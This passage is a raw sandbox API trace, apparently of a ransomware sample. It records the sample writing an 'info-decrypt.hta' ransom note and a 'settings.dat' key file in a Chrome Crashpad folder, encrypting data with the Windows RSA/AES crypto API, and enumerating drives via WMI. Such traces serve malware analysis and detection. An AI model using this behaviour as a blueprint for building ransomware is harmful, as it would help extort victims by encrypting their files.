HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\info-decrypt.hta", lpFilePart=0x0) returned 0x5d [0184.796] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eab8) returned 1 [0184.796] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949eb34 | out: lpFileInformation=0x949eb34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0184.796] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eab4) returned 1 [0184.796] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat", nBufferLength=0x105, lpBuffer=0x949e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat", lpFilePart=0x0) returned 0x59 [0184.796] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\info-decrypt.hta", lpFilePart=0x0) returned 0x5d [0184.796] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9ec) returned 1 [0184.796] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x4a8 [0184.797] GetFileType (hFile=0x4a8) returned 0x1 [0184.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9e8) returned 1 [0184.797] GetFileType (hFile=0x4a8) returned 0x1 [0184.797] WriteFile (in: hFile=0x4a8, lpBuffer=0x3607f10*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x949eab0, lpOverlapped=0x0 | out: lpBuffer=0x3607f10*, lpNumberOfBytesWritten=0x949eab0*=0x1000, lpOverlapped=0x0) returned 1 [0184.799] WriteFile (in: hFile=0x4a8, lpBuffer=0x3607f10*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x949ea84, lpOverlapped=0x0 | out: lpBuffer=0x3607f10*, lpNumberOfBytesWritten=0x949ea84*=0x55e, lpOverlapped=0x0) returned 1 [0184.799] CloseHandle (hObject=0x4a8) returned 1 [0184.799] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat", nBufferLength=0x105, lpBuffer=0x949e658, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat", lpFilePart=0x0) returned 0x59 [0184.799] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb04) returned 1 [0184.799] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat"), fInfoLevelId=0x0, lpFileInformation=0x3608f2c | out: lpFileInformation=0x3608f2c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3a6374a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x28)) returned 1 [0184.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb00) returned 1 [0184.800] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat", nBufferLength=0x105, lpBuffer=0x949e544, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat", lpFilePart=0x0) returned 0x59 [0184.800] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea38) returned 1 [0184.800] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a8 [0184.800] GetFileType (hFile=0x4a8) returned 0x1 [0184.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea34) returned 1 [0184.800] GetFileType (hFile=0x4a8) returned 0x1 [0184.800] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x949eb40 | out: lpFileSizeHigh=0x949eb40*=0x0) returned 0x28 [0184.800] ReadFile (in: hFile=0x4a8, lpBuffer=0x36091c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x949eaec, lpOverlapped=0x0 | out: lpBuffer=0x36091c0*, lpNumberOfBytesRead=0x949eaec*=0x28, lpOverlapped=0x0) returned 1 [0184.801] CloseHandle (hObject=0x4a8) returned 1 [0184.801] CryptAcquireContextW (in: phProv=0x949ea8c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949ea8c*=0x66bb1e0) returned 1 [0184.802] CryptGenRandom (in: hProv=0x66bb1e0, dwLen=0x10, pbBuffer=0x360a884 | out: pbBuffer=0x360a884) returned 1 [0185.685] CryptImportKey (in: hProv=0x66bb1e0, pbData=0x37ea990, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949ea5c | out: phKey=0x949ea5c*=0xb7fa50) returned 1 [0185.685] CryptContextAddRef (hProv=0x66bb1e0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0185.685] CryptContextAddRef (hProv=0x66bb1e0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0185.685] CryptDuplicateKey (in: hKey=0xb7fa50, pdwReserved=0x0, dwFlags=0x0, phKey=0x949ea4c | out: phKey=0x949ea4c*=0xb7fb90) returned 1 [0185.685] CryptContextAddRef (hProv=0x66bb1e0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0185.685] CryptSetKeyParam (hKey=0xb7fb90, dwParam=0x4, pbData=0x37eaa70*=0x1, dwFlags=0x0) returned 1 [0185.685] CryptSetKeyParam (hKey=0xb7fb90, dwParam=0x1, pbData=0x37eaa3c, dwFlags=0x0) returned 1 [0185.686] CryptEncrypt (in: hKey=0xb7fb90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37eaa80*, pdwDataLen=0x949eab8*=0x30, dwBufLen=0x30 | out: pbData=0x37eaa80*, pdwDataLen=0x949eab8*=0x30) returned 1 [0185.686] CryptEncrypt (in: hKey=0xb7fb90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37eaad4*, pdwDataLen=0x949eac0*=0x0, dwBufLen=0x10 | out: pbData=0x37eaad4*, pdwDataLen=0x949eac0*=0x10) returned 1 [0185.687] CryptDestroyKey (hKey=0xb7fa50) returned 1 [0185.687] CryptReleaseContext (hProv=0x66bb1e0, dwFlags=0x0) returned 1 [0185.687] CryptReleaseContext (hProv=0x66bb1e0, dwFlags=0x0) returned 1 [0185.687] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat", nBufferLength=0x105, lpBuffer=0x949e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat", lpFilePart=0x0) returned 0x59 [0185.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea24) returned 1 [0185.687] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x208 [0185.688] GetFileType (hFile=0x208) returned 0x1 [0185.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea20) returned 1 [0185.688] GetFileType (hFile=0x208) returned 0x1 [0185.688] WriteFile (in: hFile=0x208, lpBuffer=0x37eb120*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949eab4, lpOverlapped=0x0 | out: lpBuffer=0x37eb120*, lpNumberOfBytesWritten=0x949eab4*=0x20, lpOverlapped=0x0) returned 1 [0185.689] CloseHandle (hObject=0x208) returned 1 [0185.690] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0185.690] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0185.690] CoTaskMemFree (pv=0xbed438) [0185.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e518, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0185.691] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949ea60 | out: ppv=0x949ea60*=0xb51e34) returned 0x0 [0185.691] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949ea58 | out: pAptType=0x949ea58*=1) returned 0x0 [0185.691] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949ea5c | out: ppvObject=0x949ea5c*=0x0) returned 0x80004002 [0185.691] IUnknown:Release (This=0xb51e34) returned 0x1 [0185.693] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e3c8 | out: ppv=0x949e3c8*=0x6027880) returned 0x0 [0185.693] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027880, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e5e0 | out: ppvObject=0x949e5e0*=0x0) returned 0x80004002 [0185.693] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027880, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e5f4 | out: ppvObject=0x949e5f4*=0x6030ef0) returned 0x0 [0185.693] WbemDefPath:IUnknown:Release (This=0x6027880) returned 0x0 [0185.693] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030ef0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e214 | out: ppvObject=0x949e214*=0x6030ef0) returned 0x0 [0185.693] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030ef0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e1d0 | out: ppvObject=0x949e1d0*=0x0) returned 0x80004002 [0185.694] WbemDefPath:IUnknown:AddRef (This=0x6030ef0) returned 0x3 [0185.694] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030ef0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949db2c | out: ppvObject=0x949db2c*=0x0) returned 0x80004002 [0185.694] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030ef0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dadc | out: ppvObject=0x949dadc*=0x0) returned 0x80004002 [0185.694] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030ef0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dae8 | out: ppvObject=0x949dae8*=0x66ce3e8) returned 0x0 [0185.694] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce3e8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949daf0 | out: pCid=0x949daf0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0185.694] WbemDefPath:IUnknown:Release (This=0x66ce3e8) returned 0x3 [0185.694] CoGetContextToken (in: pToken=0x949db48 | out: pToken=0x949db48) returned 0x0 [0185.694] CoGetContextToken (in: pToken=0x949df50 | out: pToken=0x949df50) returned 0x0 [0185.694] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030ef0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dfe0 | out: ppvObject=0x949dfe0*=0x0) returned 0x80004002 [0185.694] WbemDefPath:IUnknown:Release (This=0x6030ef0) returned 0x2 [0185.694] WbemDefPath:IUnknown:Release (This=0x6030ef0) returned 0x1 [0185.694] CoGetContextToken (in: pToken=0x949e8d8 | out: pToken=0x949e8d8) returned 0x0 [0185.694] CoGetContextToken (in: pToken=0x949e838 | out: pToken=0x949e838) returned 0x0 [0185.694] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030ef0, riid=0x949e908*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e904 | out: ppvObject=0x949e904*=0x6030ef0) returned 0x0 [0185.694] WbemDefPath:IUnknown:AddRef (This=0x6030ef0) returned 0x3 [0185.694] WbemDefPath:IUnknown:Release (This=0x6030ef0) returned 0x2 [0185.695] WbemDefPath:IWbemPath:SetText (This=0x6030ef0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0185.695] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030ef0, puCount=0x949ea8c | out: puCount=0x949ea8c*=0x0) returned 0x0 [0185.695] WbemDefPath:IWbemPath:GetText (in: This=0x6030ef0, lFlags=2, puBuffLength=0x949ea88*=0x0, pszText=0x0 | out: puBuffLength=0x949ea88*=0x20, pszText=0x0) returned 0x0 [0185.695] WbemDefPath:IWbemPath:GetText (in: This=0x6030ef0, lFlags=2, puBuffLength=0x949ea88*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea88*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0185.695] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030ef0, uRequestedInfo=0x0, puResponse=0x949ea94 | out: puResponse=0x949ea94*=0xc19) returned 0x0 [0185.695] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030ef0, puCount=0x949ea8c | out: puCount=0x949ea8c*=0x0) returned 0x0 [0185.695] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030ef0, uRequestedInfo=0x0, puResponse=0x949ea94 | out: puResponse=0x949ea94*=0xc19) returned 0x0 [0185.695] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030ef0, uRequestedInfo=0x0, puResponse=0x949ea94 | out: puResponse=0x949ea94*=0xc19) returned 0x0 [0185.695] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030ef0, puCount=0x949ea0c | out: puCount=0x949ea0c*=0x0) returned 0x0 [0185.695] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949e9f8 | out: puCount=0x949e9f8*=0x2) returned 0x0 [0185.695] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e9f4*=0x0, pszText=0x0 | out: puBuffLength=0x949e9f4*=0xf, pszText=0x0) returned 0x0 [0185.695] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e9f4*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9f4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0185.695] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e9a8 | out: ppv=0x949e9a8*=0xb51e34) returned 0x0 [0185.695] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e9a0 | out: pAptType=0x949e9a0*=1) returned 0x0 [0185.695] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e9a4 | out: ppvObject=0x949e9a4*=0x0) returned 0x80004002 [0185.695] IUnknown:Release (This=0xb51e34) returned 0x1 [0185.696] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e310 | out: ppv=0x949e310*=0x6027870) returned 0x0 [0185.696] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027870, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e528 | out: ppvObject=0x949e528*=0x0) returned 0x80004002 [0185.696] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027870, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e53c | out: ppvObject=0x949e53c*=0x6030e80) returned 0x0 [0185.696] WbemDefPath:IUnknown:Release (This=0x6027870) returned 0x0 [0185.697] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e80, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e15c | out: ppvObject=0x949e15c*=0x6030e80) returned 0x0 [0185.697] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e80, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e118 | out: ppvObject=0x949e118*=0x0) returned 0x80004002 [0185.697] WbemDefPath:IUnknown:AddRef (This=0x6030e80) returned 0x3 [0185.697] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e80, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949da74 | out: ppvObject=0x949da74*=0x0) returned 0x80004002 [0185.697] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e80, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949da24 | out: ppvObject=0x949da24*=0x0) returned 0x80004002 [0185.697] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e80, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949da30 | out: ppvObject=0x949da30*=0x66ce208) returned 0x0 [0185.697] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce208, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949da38 | out: pCid=0x949da38*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0185.697] WbemDefPath:IUnknown:Release (This=0x66ce208) returned 0x3 [0185.697] CoGetContextToken (in: pToken=0x949da90 | out: pToken=0x949da90) returned 0x0 [0185.697] CoGetContextToken (in: pToken=0x949de98 | out: pToken=0x949de98) returned 0x0 [0185.697] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e80, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949df28 | out: ppvObject=0x949df28*=0x0) returned 0x80004002 [0185.697] WbemDefPath:IUnknown:Release (This=0x6030e80) returned 0x2 [0185.697] WbemDefPath:IUnknown:Release (This=0x6030e80) returned 0x1 [0185.697] CoGetContextToken (in: pToken=0x949e820 | out: pToken=0x949e820) returned 0x0 [0185.697] CoGetContextToken (in: pToken=0x949e780 | out: pToken=0x949e780) returned 0x0 [0185.697] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e80, riid=0x949e850*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e84c | out: ppvObject=0x949e84c*=0x6030e80) returned 0x0 [0185.697] WbemDefPath:IUnknown:AddRef (This=0x6030e80) returned 0x3 [0185.697] WbemDefPath:IUnknown:Release (This=0x6030e80) returned 0x2 [0185.697] WbemDefPath:IWbemPath:SetText (This=0x6030e80, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0185.697] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030e80, puCount=0x949e9d0 | out: puCount=0x949e9d0*=0x2) returned 0x0 [0185.698] WbemDefPath:IWbemPath:GetText (in: This=0x6030e80, lFlags=4, puBuffLength=0x949e9cc*=0x0, pszText=0x0 | out: puBuffLength=0x949e9cc*=0xf, pszText=0x0) returned 0x0 [0185.698] WbemDefPath:IWbemPath:GetText (in: This=0x6030e80, lFlags=4, puBuffLength=0x949e9cc*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9cc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0185.698] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e9d0 | out: ppv=0x949e9d0*=0xb51e34) returned 0x0 [0185.698] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e9c8 | out: pAptType=0x949e9c8*=1) returned 0x0 [0185.698] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e9cc | out: ppvObject=0x949e9cc*=0x0) returned 0x80004002 [0185.698] IUnknown:Release (This=0xb51e34) returned 0x1 [0185.699] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e5f0 | out: ppv=0x949e5f0*=0x601f6a8) returned 0x0 [0185.699] WbemLocator:IUnknown:QueryInterface (in: This=0x601f6a8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e808 | out: ppvObject=0x949e808*=0x0) returned 0x80004002 [0185.699] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f6a8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e81c | out: ppvObject=0x949e81c*=0x6027800) returned 0x0 [0185.699] WbemLocator:IUnknown:Release (This=0x601f6a8) returned 0x0 [0185.699] WbemLocator:IUnknown:QueryInterface (in: This=0x6027800, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e43c | out: 